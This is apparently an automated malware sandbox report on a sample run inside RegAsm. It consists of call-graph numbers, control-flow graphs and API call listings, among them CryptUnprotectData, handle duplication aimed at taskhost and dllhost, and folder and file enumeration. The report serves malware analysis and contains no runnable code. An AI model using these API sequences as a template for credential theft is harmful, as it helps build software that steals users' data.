39768 41ee6b 85 API calls 39767->39768 39769 41fc5d 39768->39769 39769->39735 39770->39731 39773 41fd65 39771->39773 39772 41fdab 39772->39730 39773->39772 39774 41fbdb 85 API calls 39773->39774 39774->39773 39776 41ee41 39775->39776 39777 41ee32 39775->39777 39786 41edad 39776->39786 39789 4446ce 11 API calls 39777->39789 39780 41ee3c 39780->39765 39783 41ee58 39783->39780 39791 41ee6b 39783->39791 39785->39766 39795 41be52 39786->39795 39789->39780 39790 41eb85 11 API calls 39790->39783 39792 41ee70 39791->39792 39793 41ee78 39791->39793 39833 41bf99 85 API calls 39792->39833 39793->39780 39796 41be6f 39795->39796 39797 41be5f 39795->39797 39802 41be8c 39796->39802 39827 418c63 memset memset 39796->39827 39826 4446ce 11 API calls 39797->39826 39799 41be69 39799->39780 39799->39790 39802->39799 39803 41bf3a 39802->39803 39804 41bed1 39802->39804 39807 41bee7 39802->39807 39830 4446ce 11 API calls 39803->39830 39806 41bef0 39804->39806 39809 41bee2 39804->39809 39806->39807 39808 41bf01 39806->39808 39807->39799 39831 41a453 85 API calls 39807->39831 39810 41bf24 memset 39808->39810 39812 41bf14 39808->39812 39828 418a6d memset memcpy memset 39808->39828 39816 41ac13 39809->39816 39810->39799 39829 41a223 memset memcpy memset 39812->39829 39815 41bf20 39815->39810 39817 41ac52 39816->39817 39818 41ac3f memset 39816->39818 39821 41ac6a 39817->39821 39832 41dc14 19 API calls 39817->39832 39819 41acd9 39818->39819 39819->39807 39822 41519d 6 API calls 39821->39822 39823 41aca1 39821->39823 39822->39823 39823->39819 39824 41acc0 memset 39823->39824 39825 41accd memcpy 39823->39825 39824->39819 39825->39819 39826->39799 39827->39802 39828->39812 39829->39815 39830->39807 39832->39821 39833->39793 39834 417bc5 39836 417c61 39834->39836 39839 417bda 39834->39839 39835 417bf6 UnmapViewOfFile CloseHandle 39835->39835 39835->39839 39838 417c2c 39838->39839 39846 41851e 18 API calls 39838->39846 39839->39835 39839->39836 39839->39838 39841 4175b7 39839->39841 39842 4175d6 CloseHandle 39841->39842 39843 4175c8 39842->39843 39844 4175df 39842->39844 39843->39844 39845 4175ce Sleep 39843->39845 39844->39839 39845->39842 39846->39838 39847 4148b6 FindResourceW 39848 4148cf SizeofResource 39847->39848 39851 4148f9 39847->39851 39849 4148e0 LoadResource 39848->39849 39848->39851 39850 4148ee LockResource 39849->39850 39849->39851 39850->39851 39852 441b3f 39862 43a9f6 39852->39862 39854 441b61 40035 4386af memset 39854->40035 39856 44189a 39857 4418e2 39856->39857 39859 442bd4 39856->39859 39858 4418ea 39857->39858 40036 4414a9 12 API calls 39857->40036 39859->39858 40037 441409 memset 39859->40037 39863 43aa20 39862->39863 39870 43aadf 39862->39870 39864 43aa34 memset 39863->39864 39863->39870 39865 43aa56 39864->39865 39866 43aa4d 39864->39866 40038 43a6e7 39865->40038 40046 42c02e memset 39866->40046 39870->39854 39872 43aad3 40048 4169a7 11 API calls 39872->40048 39873 43aaae 39873->39870 39873->39872 39888 43aae5 39873->39888 39874 43ac18 39877 43ac47 39874->39877 40050 42bbd5 memcpy memcpy memcpy memset memcpy 39874->40050 39878 43aca8 39877->39878 40051 438eed 16 API calls 39877->40051 39882 43acd5 39878->39882 40053 4233ae 11 API calls 39878->40053 39881 43ac87 40052 4233c5 16 API calls 39881->40052 40054 423426 11 API calls 39882->40054 39886 43ace1 40055 439811 162 API calls 39886->40055 39887 43a9f6 160 API calls 39887->39888 39888->39870 39888->39874 39888->39887 40049 439bbb 22 API calls 39888->40049 39890 43acfd 39895 43ad2c 39890->39895 40056 438eed 16 API calls 39890->40056 39892 43ad19 40057 4233c5 16 API calls 39892->40057 39894 43ad58 40058 44081d 162 API calls 39894->40058 39895->39894 39898 43add9 39895->39898 39898->39898 40062 423426 11 API calls 39898->40062 39899 43ae3a memset 39900 43ae73 39899->39900 40063 42e1c0 146 API calls 39900->40063 39901 43adab 40060 438c4e 162 API calls 39901->40060 39902 43ad6c 39902->39870 39902->39901 40059 42370b memset memcpy memset 39902->40059 39906 43adcc 40061 440f84 12 API calls 39906->40061 39907 43ae96 40064 42e1c0 146 API calls 39907->40064 39910 43aea8 39913 43aec1 39910->39913 40065 42e199 146 API calls 39910->40065 39912 43af00 39912->39870 39917 43af1a 39912->39917 39918 43b3d9 39912->39918 39913->39912 40066 42e1c0 146 API calls 39913->40066 39914 43add4 39919 43b60f 39914->39919 40125 438f86 16 API calls 39914->40125 40067 438eed 16 API calls 39917->40067 39923 43b3f6 39918->39923 39928 43b4c8 39918->39928 39919->39870 40126 4393a5 17 API calls 39919->40126 39922 43af2f 40068 4233c5 16 API calls 39922->40068 40108 432878 12 API calls 39923->40108 39925 43af51 40069 423426 11 API calls 39925->40069 39927 43b4f2 40115 43a76c 21 API calls 39927->40115 39928->39927 40114 42bbd5 memcpy memcpy memcpy memset memcpy 39928->40114 39930 43af7d 40070 423426 11 API calls 39930->40070 39934 43af94 40071 423330 11 API calls 39934->40071 39935 43b529 40116 44081d 162 API calls 39935->40116 39936 43b462 40110 423330 11 API calls 39936->40110 39940 43b544 39944 43b55c 39940->39944 40117 42c02e memset 39940->40117 39941 43b428 39941->39936 40109 432b60 16 API calls 39941->40109 39942 43afca 40072 423330 11 API calls 39942->40072 39943 43b47e 39946 43b497 39943->39946 40111 42374a memcpy memset memcpy memcpy memcpy 39943->40111 40118 43a87a 162 API calls 39944->40118 40112 4233ae 11 API calls 39946->40112 39949 43afdb 40073 4233ae 11 API calls 39949->40073 39952 43b4b1 40113 423399 11 API calls 39952->40113 39954 43b56c 39957 43b58a 39954->39957 40119 423330 11 API calls 39954->40119 39956 43afee 40074 44081d 162 API calls 39956->40074 40120 440f84 12 API calls 39957->40120 39958 43b4c1 40122 42db80 162 API calls 39958->40122 39963 43b592 40121 43a82f 16 API calls 39963->40121 39966 43b5b4 40123 438c4e 162 API calls 39966->40123 39968 43b5cf 40124 42c02e memset 39968->40124 39970 43b005 39970->39870 39975 43b01f 39970->39975 40075 42d836 162 API calls 39970->40075 39971 43b1ef 40085 4233c5 16 API calls 39971->40085 39973 43b212 40086 423330 11 API calls 39973->40086 39975->39971 40083 423330 11 API calls 39975->40083 40084 42d71d 162 API calls 39975->40084 39977 43b087 40076 4233ae 11 API calls 39977->40076 39980 43b22a 40087 42ccb5 11 API calls 39980->40087 39983 43b23f 40088 4233ae 11 API calls 39983->40088 39984 43b10f 40079 423330 11 API calls 39984->40079 39986 43b257 40089 4233ae 11 API calls 39986->40089 39990 43b129 40080 4233ae 11 API calls 39990->40080 39991 43b26e 40090 4233ae 11 API calls 39991->40090 39994 43b09a 39994->39984 40077 42cc15 19 API calls 39994->40077 40078 4233ae 11 API calls 39994->40078 39996 43b282 40091 43a87a 162 API calls 39996->40091 39997 43b13c 40081 440f84 12 API calls 39997->40081 39999 43b29d 40092 423330 11 API calls 39999->40092 40002 43b15f 40082 4233ae 11 API calls 40002->40082 40003 43b2af 40005 43b2b8 40003->40005 40006 43b2ce 40003->40006 40093 4233ae 11 API calls 40005->40093 40094 440f84 12 API calls 40006->40094 40009 43b2c9 40096 4233ae 11 API calls 40009->40096 40010 43b2da 40095 42370b memset memcpy memset 40010->40095 40013 43b2f9 40097 423330 11 API calls 40013->40097 40015 43b30b 40098 423330 11 API calls 40015->40098 40017 43b325 40099 423399 11 API calls 40017->40099 40019 43b332 40100 4233ae 11 API calls 40019->40100 40021 43b354 40101 423399 11 API calls 40021->40101 40023 43b364 40102 43a82f 16 API calls 40023->40102 40025 43b370 40103 42db80 162 API calls 40025->40103 40027 43b380 40104 438c4e 162 API calls 40027->40104 40029 43b39e 40105 423399 11 API calls 40029->40105 40031 43b3ae 40106 43a76c 21 API calls 40031->40106 40033 43b3c3 40107 423399 11 API calls 40033->40107 40035->39856 40036->39858 40037->39859 40039 43a6f5 40038->40039 40040 43a765 40038->40040 40039->40040 40127 42a115 40039->40127 40040->39870 40047 4397fd memset 40040->40047 40044 43a73d 40044->40040 40045 42a115 146 API calls 40044->40045 40045->40040 40046->39865 40047->39873 40048->39870 40049->39888 40050->39877 40051->39881 40052->39878 40053->39882 40054->39886 40055->39890 40056->39892 40057->39895 40058->39902 40059->39901 40060->39906 40061->39914 40062->39899 40063->39907 40064->39910 40065->39913 40066->39913 40067->39922 40068->39925 40069->39930 40070->39934 40071->39942 40072->39949 40073->39956 40074->39970 40075->39977 40076->39994 40077->39994 40078->39994 40079->39990 40080->39997 40081->40002 40082->39975 40083->39975 40084->39975 40085->39973 40086->39980 40087->39983 40088->39986 40089->39991 40090->39996 40091->39999 40092->40003 40093->40009 40094->40010 40095->40009 40096->40013 40097->40015 40098->40017 40099->40019 40100->40021 40101->40023 40102->40025 40103->40027 40104->40029 40105->40031 40106->40033 40107->39914 40108->39941 40109->39936 40110->39943 40111->39946 40112->39952 40113->39958 40114->39927 40115->39935 40116->39940 40117->39944 40118->39954 40119->39957 40120->39963 40121->39958 40122->39966 40123->39968 40124->39914 40125->39919 40126->39870 40128 42a175 40127->40128 40130 42a122 40127->40130 40128->40040 40133 42b13b 146 API calls 40128->40133 40130->40128 40131 42a115 146 API calls 40130->40131 40134 43a174 40130->40134 40158 42a0a8 146 API calls 40130->40158 40131->40130 40133->40044 40148 43a196 40134->40148 40149 43a19e 40134->40149 40135 43a306 40135->40148 40172 4388c4 14 API calls 40135->40172 40138 42a115 146 API calls 40138->40149 40139 415a91 memset 40139->40149 40140 43a642 40140->40148 40177 4169a7 11 API calls 40140->40177 40144 43a635 40176 42c02e memset 40144->40176 40148->40130 40149->40135 40149->40138 40149->40139 40149->40148 40159 42ff8c 40149->40159 40167 4165ff 11 API calls 40149->40167 40168 439504 13 API calls 40149->40168 40169 4312d0 146 API calls 40149->40169 40170 42be4c memcpy memcpy memcpy memset memcpy 40149->40170 40171 43a121 11 API calls 40149->40171 40151 42bf4c 14 API calls 40153 43a325 40151->40153 40152 4169a7 11 API calls 40152->40153 40153->40140 40153->40144 40153->40148 40153->40151 40153->40152 40154 42b5b5 memset memcpy 40153->40154 40173 42b63e 14 API calls 40153->40173 40174 4165ff 11 API calls 40153->40174 40175 42bfcf memcpy 40153->40175 40154->40153 40158->40130 40178 43817e 40159->40178 40161 42ff99 40162 42ffe3 40161->40162 40163 42ffd0 40161->40163 40166 42ff9d 40161->40166 40183 4169a7 11 API calls 40162->40183 40182 4169a7 11 API calls 40163->40182 40166->40149 40167->40149 40168->40149 40169->40149 40170->40149 40171->40149 40172->40153 40173->40153 40174->40153 40175->40153 40176->40140 40177->40148 40179 438187 40178->40179 40181 438192 40178->40181 40184 4380f6 40179->40184 40181->40161 40182->40166 40183->40166 40186 43811f 40184->40186 40185 438164 40185->40181 40186->40185 40189 437e5e 40186->40189 40212 4300e8 memset memset memcpy 40186->40212 40213 437d3c 40189->40213 40191 437ea9 40192 437eb3 40191->40192 40198 437f22 40191->40198 40228 41f432 40191->40228 40192->40186 40195 437f06 40239 415c56 11 API calls 40195->40239 40197 437f95 40240 415c56 11 API calls 40197->40240 40199 437f7f 40198->40199 40200 432d4e 3 API calls 40198->40200 40199->40197 40201 43802b 40199->40201 40200->40199 40241 4165ff 11 API calls 40201->40241 40204 438054 40242 437371 137 API calls 40204->40242 40207 43806b 40208 438094 40207->40208 40243 42f50e 137 API calls 40207->40243 40209 437fa3 40208->40209 40244 4300e8 memset memset memcpy 40208->40244 40209->40192 40245 41f638 103 API calls 40209->40245 40212->40186 40214 437d69 40213->40214 40217 437d80 40213->40217 40246 437ccb 11 API calls 40214->40246 40216 437d76 40216->40191 40217->40216 40218 437da3 40217->40218 40221 437d90 40217->40221 40220 438460 133 API calls 40218->40220 40224 437dcb 40220->40224 40221->40216 40250 437ccb 11 API calls 40221->40250 40222 437de8 40249 424f26 122 API calls 40222->40249 40224->40222 40247 444283 13 API calls 40224->40247 40226 437dfc 40248 437ccb 11 API calls 40226->40248 40229 41f54d 40228->40229 40235 41f44f 40228->40235 40230 41f466 40229->40230 40280 41c635 memset memset 40229->40280 40230->40195 40230->40198 40235->40230 40237 41f50b 40235->40237 40251 41f1a5 40235->40251 40276 41c06f memcmp 40235->40276 40277 41f3b1 89 API calls 40235->40277 40278 41f398 85 API calls 40235->40278 40237->40229 40237->40230 40279 41c295 85 API calls 40237->40279 40239->40192 40240->40209 40241->40204 40242->40207 40243->40208 40244->40209 40245->40192 40246->40216 40247->40226 40248->40222 40249->40216 40250->40216 40252 41bc3b 100 API calls 40251->40252 40253 41f1b4 40252->40253 40254 41edad 85 API calls 40253->40254 40261 41f282 40253->40261 40255 41f1cb 40254->40255 40256 41f1f5 memcmp 40255->40256 40257 41f20e 40255->40257 40255->40261 40256->40257 40258 41f21b memcmp 40257->40258 40257->40261 40259 41f326 40258->40259 40262 41f23d 40258->40262 40260 41ee6b 85 API calls 40259->40260 40259->40261 40260->40261 40261->40235 40262->40259 40263 41f28e memcmp 40262->40263 40265 41c8df 55 API calls 40262->40265 40263->40259 40264 41f2a9 40263->40264 40264->40259 40267 41f308 40264->40267 40268 41f2d8 40264->40268 40266 41f269 40265->40266 40266->40259 40269 41f287 40266->40269 40270 41f27a 40266->40270 40267->40259 40274 4446ce 11 API calls 40267->40274 40271 41ee6b 85 API calls 40268->40271 40269->40263 40272 41ee6b 85 API calls 40270->40272 40273 41f2e0 40271->40273 40272->40261 40275 41b1ca memset 40273->40275 40274->40259 40275->40261 40276->40235 40277->40235 40278->40235 40279->40229 40280->40230 40281 41493c EnumResourceNamesW 40282 44660a 40285 4465e4 40282->40285 40284 446613 40286 4465f3 __dllonexit 40285->40286 40287 4465ed _onexit 40285->40287 40286->40284 40287->40286

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 338 40dd85-40ddeb memset call 409bca CreateFileW 341 40ddf1-40de09 call 40afcf call 41352f 338->341 346 40de0b-40de1a NtQuerySystemInformation 341->346 347 40de1c 341->347 348 40de20-40de27 346->348 347->348 349 40de29-40de39 348->349 350 40de3b-40de52 CloseHandle GetCurrentProcessId 348->350 349->341 349->350 351 40de54-40de58 350->351 352 40de7a-40de8e call 413cfa call 413d4c 350->352 351->352 353 40de5a 351->353 362 40de94-40debb call 40e6ad call 409c52 _wcsicmp 352->362 363 40e00c-40e01b call 413d29 352->363 355 40de5d-40de63 353->355 357 40de74-40de78 355->357 358 40de65-40de6c 355->358 357->352 357->355 358->357 360 40de6e-40de71 358->360 360->357 370 40dee7-40def7 OpenProcess 362->370 371 40debd-40dece _wcsicmp 362->371 373 40dff8-40dffb 370->373 374 40defd-40df02 370->374 371->370 372 40ded0-40dee1 _wcsicmp 371->372 372->370 375 40dffd-40e006 372->375 373->363 373->375 376 40df08 374->376 377 40dfef-40dff2 CloseHandle 374->377 375->362 375->363 378 40df0b-40df10 376->378 377->373 379 40df16-40df1d 378->379 380 40dfbd-40dfcb 378->380 379->380 382 40df23-40df4a GetCurrentProcess DuplicateHandle 379->382 380->378 381 40dfd1-40dfd3 380->381 381->377 382->380 383 40df4c-40df76 memset call 41352f 382->383 386 40df78-40df8a 383->386 387 40df8f-40dfbb CloseHandle call 409c52 * 2 _wcsicmp 383->387 386->387 387->380 392 40dfd5-40dfed 387->392 392->377
                            APIs
                            • memset.MSVCRT ref: 0040DDAD
                              • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                            • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                              • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                              • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                            • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                            • CloseHandle.KERNEL32(C0000004), ref: 0040DE3E
                            • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                            • _wcsicmp.MSVCRT ref: 0040DEB2
                            • _wcsicmp.MSVCRT ref: 0040DEC5
                            • _wcsicmp.MSVCRT ref: 0040DED8
                            • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                            • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                            • DuplicateHandle.KERNEL32(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                            • memset.MSVCRT ref: 0040DF5F
                            • CloseHandle.KERNEL32(C0000004), ref: 0040DF92
                            • _wcsicmp.MSVCRT ref: 0040DFB2
                            • CloseHandle.KERNEL32(00000104), ref: 0040DFF2
                            Strings
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
                            • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                            • API String ID: 2018390131-3398334509
                            • Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                            • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                            • Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                            • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58
                            APIs
                              • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                              • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                              • Part of subcall function 00418680: ??3@YAXPAX@Z.MSVCRT ref: 004186C7
                              • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                            • GetDiskFreeSpaceW.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                            • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                            • ??3@YAXPAX@Z.MSVCRT ref: 00418803
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: ??3@DiskFreeSpace$FullNamePathVersionmalloc
                            • String ID:
                            • API String ID: 2947809556-0
                            • Opcode ID: 940d27dee81e78af7b1dcfc54f007828992184dafba41df18b595ae7ea53f8f2
                            • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                            • Opcode Fuzzy Hash: 940d27dee81e78af7b1dcfc54f007828992184dafba41df18b595ae7ea53f8f2
                            • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                            APIs
                            • CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                            • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: Library$Load$CryptDataDirectoryFreeSystemUnprotectmemsetwcscatwcscpy
                            • String ID:
                            • API String ID: 1945712969-0
                            • Opcode ID: 1380316316acfdf23ecbbce53536a9302c8f7369fa9bad9ede14c1568be36e2a
                            • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                            • Opcode Fuzzy Hash: 1380316316acfdf23ecbbce53536a9302c8f7369fa9bad9ede14c1568be36e2a
                            • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                            APIs
                            • FindFirstFileW.KERNEL32(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                            • FindNextFileW.KERNEL32(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: FileFind$FirstNext
                            • String ID:
                            • API String ID: 1690352074-0
                            • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                            • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                            • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                            • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                            APIs
                            • memset.MSVCRT ref: 0041898C
                            • GetSystemInfo.KERNEL32(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                            Memory Dump Source
                            • Source File: 0000000B.00000002.380734879.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                            Similarity
                            • API ID: InfoSystemmemset
                            • String ID:
                            • API String ID: 3558857096-0
                            • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                            • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                            • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                            • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 0 44553b-445558 call 44db70 3 445599-4455a2 0->3 4 44555a-44557c call 40c768 call 40bdb0 call 4135f7 0->4 5 4455a8-4455e3 memset call 403988 wcsrchr 3->5 6 4457fb 3->6 42 44558e-445594 call 444b06 4->42 43 44557e-445580 call 4136c0 4->43 15 4455e5 5->15 16 4455e8-4455f9 5->16 10 445800-445809 6->10 13 445856-44585f 10->13 14 44580b-44581e call 40a889 call 403e2d 10->14 18 445861-445874 call 40a889 call 403c9c 13->18 19 4458ac-4458b5 13->19 45 445823-445826 14->45 15->16 21 445672-445683 call 40a889 call 403fbe 16->21 22 4455fb-445601 16->22 52 445879-44587c 18->52 23 44594f-445958 19->23 24 4458bb-44592b memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 19->24 87 445685 21->87 88 4456b2-4456b5 call 40b1ab 21->88 30 445605-445607 22->30 31 445603 22->31 28 4459f2-4459fa 23->28 29 44595e-4459ce memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 23->29 138 44592d-445945 call 40b6ef 24->138 139 44594a 24->139 37 445a00-445aa1 memset * 2 call 414c2e call 40b2cc call 409d1f call 40b2cc call 40ae18 28->37 38 445b29-445b32 28->38 157 4459d0-4459e8 call 40b6ef 29->157 158 4459ed 29->158 30->21 41 445609-44560d 30->41 31->30 182 445b08-445b15 call 40ae51 37->182 53 445c7c-445c85 38->53 54 445b38-445b96 memset * 3 38->54 41->21 50 44560f-445641 call 4087b3 call 40a889 call 4454bf 41->50 42->3 66 445585-44558c call 41366b 43->66 55 44584c-445854 call 40b1ab 45->55 56 445828 45->56 154 445665-445670 call 40b1ab 50->154 155 445643-445663 call 40a9b5 call 4087b3 50->155 67 4458a2-4458aa call 40b1ab 52->67 68 44587e 52->68 63 445d1c-445d25 53->63 64 445c8b-445cf3 memset * 2 call 414c2e call 409d1f call 409b98 53->64 69 445bd4-445c72 call 414c2e call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 54->69 70 445b98-445ba0 54->70 55->13 71 44582e-445847 call 40a9b5 call 4087b3 56->71 76 445fae-445fb2 63->76 77 445d2b-445d3b 63->77 159 445cf5 64->159 160 445cfc-445d03 64->160 66->42 67->19 85 445884-44589d call 40a9b5 call 4087b3 68->85 249 445c77 69->249 70->69 86 445ba2-445bcf call 4099c6 call 445403 call 445389 70->86 141 445849 71->141 93 445d3d-445d65 call 409c52 call 40b2cc _wcsicmp 77->93 94 445d88-445e15 memset * 3 call 414c2e call 40b2cc call 409d1f call 409b98 77->94 146 44589f 85->146 86->53 103 44568b-4456a4 call 40a9b5 call 4087b3 87->103 106 4456ba-4456c4 88->106 165 445d67-445d6c 93->165 166 445d71-445d83 call 445093 93->166 196 445e17 94->196 197 445e1e-445e25 94->197 148 4456a9-4456b0 103->148 120 4457f9 106->120 121 4456ca-4456d3 call 413cfa call 413d4c 106->121 120->6 174 4456d8-4456f7 call 40b2cc call 413fa6 121->174 138->139 139->23 141->55 146->67 148->88 148->103 154->106 155->154 157->158 158->28 159->160 171 445d05-445d13 160->171 172 445d17 160->172 176 445fa1-445fa9 call 40b6ef 165->176 166->76 171->172 172->63 206 4456fd-445796 memset * 4 call 409c70 * 3 174->206 207 4457ea-4457f7 call 413d29 174->207 176->76 200 445b17-445b27 call 40aebe 182->200 201 445aa3-445ab0 call 40add4 182->201 196->197 202 445e27-445e59 call 40b2cc call 409d1f call 409b98 197->202 203 445e6b-445e7e call 445093 197->203 200->38 201->182 220 445ab2-445b03 memset call 40b2cc call 409d1f call 445389 201->220 239 445e62-445e69 202->239 240 445e5b 202->240 219 445f67-445f99 call 40b2cc call 409d1f call 409b98 203->219 206->207 248 445798-4457ca call 40b2cc call 409d1f call 409b98 206->248 207->10 219->76 253 445f9b 219->253 220->182 239->203 245 445e83-445ef5 memset call 40b2cc call 409d1f call 40ae18 239->245 240->239 264 445f4d-445f5a call 40ae51 245->264 248->207 265 4457cc-4457e5 call 4087b3 248->265 249->53 253->176 269 445ef7-445f04 call 40add4 264->269 270 445f5c-445f62 call 40aebe 264->270 265->207 269->264 274 445f06-445f38 call 40b2cc call 409d1f call 409b98 269->274 270->219 274->264 281 445f3a-445f48 call 445093 274->281 281->264
                            APIs
                            • memset.MSVCRT ref: 004455C2
                            • wcsrchr.MSVCRT ref: 004455DA
                            • memset.MSVCRT ref: 0044570D
                            • memset.MSVCRT ref: 00445725
                              • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                              • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                              • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                              • Part of subcall function 0040BDB0: _wcsncoll.MSVCRT ref: 0040BE38
                              • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                              • Part of subcall function 0040BDB0: memcpy.MSVCRT ref: 0040BEB2
                            • memset.MSVCRT ref: 0044573D
                            • memset.MSVCRT ref: 00445755
                            • memset.MSVCRT ref: 004458CB
                            • memset.MSVCRT ref: 004458E3
                            • memset.MSVCRT ref: 0044596E
                            • memset.MSVCRT ref: 00445A10
                            • memset.MSVCRT ref: 00445A28
                            • memset.MSVCRT ref: 00445AC6
                              • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                              • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                              • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                              • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                              • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT ref: 004450F0
                              • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000), ref: 004450F7
                            • memset.MSVCRT ref: 00445B52
                            • memset.MSVCRT ref: 00445B6A
                            • memset.MSVCRT ref: 00445C9B
                            • memset.MSVCRT ref: 00445CB3
                            • _wcsicmp.MSVCRT ref: 00445D56
                            • memset.MSVCRT ref: 00445B82
                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                              • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                              • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                              • Part of subcall function 0040B6EF: CreateFileW.KERNEL32(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
